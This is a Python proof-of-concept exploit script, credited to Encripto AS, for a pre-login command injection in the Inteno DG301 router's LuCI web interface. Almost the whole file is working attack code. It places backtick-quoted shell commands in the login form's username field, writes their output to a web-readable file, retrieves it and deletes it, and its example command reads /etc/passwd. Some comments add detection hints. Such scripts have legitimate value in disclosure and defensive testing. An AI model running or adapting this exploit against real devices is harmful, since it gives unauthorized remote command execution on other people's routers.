#!/usr/bin/python
################################################################
# #
# Inteno DG301 Command Injection PoC #
# #
# Vulnerable version: Powered by LuCI Trunk (inteno-1.0.34) #
# OpenWrt Backfire 10.03.1-RC6 #
# #
# Written by Juan J. Guelfo @ Encripto AS #
# post@encripto.no #
# #
# Copyright 2014 Encripto AS. All rights reserved. #
# #
# This software is licensed under the FreeBSD license. #
# http://www.encripto.no/tools/license.php #
# #
################################################################
import sys, getopt, urllib, urllib2
__version__ = "0.1"
__author__ = "Juan J. Guelfo, Encripto AS (post@encripto.no)"
# Prints title and other header info
def header():
    """Print the PoC banner: a blank line, the framed title/author box, a blank line."""
    rule = " ================================================================= "
    banner = (
        "",
        rule,
        # The title line carries no replacement field, so it is a plain literal.
        "| Inteno DG301 v1.0.34 Command Injection PoC \t\t\t |",
        "| by {0}\t\t |".format(__author__),
        rule,
        "",
    )
    for line in banner:
        print line
# Prints help
def help():
    """Print the banner and the usage text, then exit with status 0.

    This function never returns to its caller: it always ends in sys.exit(0).
    """
    # Usage text is kept verbatim; it is emitted after the banner.
    usage = """ Usage: python Inteno-DG301-PoC.py [mandatory options]
Mandatory options:
-t target ...Target IP address
-p port ...Port where the HTTP admin interface is listening on
-c cmd ...Command to inject
Example:
python Inteno-DG301-PoC.py -t 192.168.1.1 -p 80 -c "cat /etc/passwd"
"""
    header()
    print usage
    sys.exit(0)
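if __name__ == '__main__':
    # Script entry point: parse -t/-p/-c, send the proof-of-concept request to
    # the LuCI login endpoint, fetch the output file and then remove it.

    # Parse options
    try:
        options, args = getopt.getopt(sys.argv[1:], "t:p:c:", ["target=", "port=", "cmd="])
    except getopt.GetoptError as err:
        header()
        print "\n[-] Error: {0}.\n".format(str(err))
        sys.exit(1)

    if not options:
        help()

    target = None
    port = None
    cmd = None
    for opt, arg in options:
        # Real tuples are required here: ("-t") is just the string "-t", so the
        # long forms that getopt accepts above were previously never matched.
        if opt in ("-t", "--target"):
            target = arg
        elif opt in ("-p", "--port"):
            port = arg
        elif opt in ("-c", "--cmd"):
            cmd = arg

    # Option input validation
    if not target or not port or not cmd:
        # help() always ends in sys.exit(0); intercept it so the error line is
        # actually printed and the process reports a non-zero status.
        try:
            help()
        except SystemExit:
            pass
        print "[-] Error: Incorrect syntax.\n"
        sys.exit(1)

    # The port is interpolated into the request URLs below, so reject anything
    # that is not a valid TCP port number.
    if not port.isdigit() or not 1 <= int(port) <= 65535:
        header()
        print "\n[-] Error: port must be an integer between 1 and 65535.\n"
        sys.exit(1)

    header()
    print "[*] Trying to connect to {0}:{1}...".format(target, port)
    headers = { "User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"}
    try:
        # Inject command
        # The POST body places backtick-quoted text in the `username` field of
        # the login form at /cgi-bin/luci and redirects its output to
        # /www/poc.txt. The credentials are placeholders; no session is
        # established first, so the issue appears to be reachable pre-login.
        # Detection: backticks or other shell metacharacters in the `username`
        # parameter of POSTs to /cgi-bin/luci, and unexpected files under /www.
        print "[*] Sending command: {0}".format(cmd)
        data = "username=user`"+ urllib.quote(cmd) + "%20>%20/www/poc.txt`&password=pass"
        r = urllib2.Request("http://%s:%s/cgi-bin/luci" % (target, port), data, headers)
        results = urllib2.urlopen(r).read()  # login page response, not used

        # Retrieve results
        # NOTE(review): the output file is fetched without credentials, so
        # until the cleanup request below runs, anyone who can reach the admin
        # interface can read it as well.
        r = urllib2.Request("http://%s:%s/poc.txt" % (target, port), None, headers)
        results = urllib2.urlopen(r).read()

        # Show results
        print "[+] Retrieving results...\n"
        print results

        # Clean output file
        # NOTE(review): this request is skipped when either request above
        # raises, in which case the output file may remain on the device and
        # must be checked for and removed by hand.
        data = "username=user`rm%20/www/poc.txt`&password=pass"
        r = urllib2.Request("http://%s:%s/cgi-bin/luci" % (target, port), data, headers)
        results = urllib2.urlopen(r).read()
        print "[*] Cleaning up...\n"
    except urllib2.URLError:
        # urllib2.HTTPError subclasses URLError, so an HTTP error status (for
        # example a 404 for the output file) is reported with this message too.
        print "[-] Error: The connection could not be established.\n"
    except IOError as e:
        print "[-] Error: {0}...\n".format(e.strerror)
    sys.exit(0)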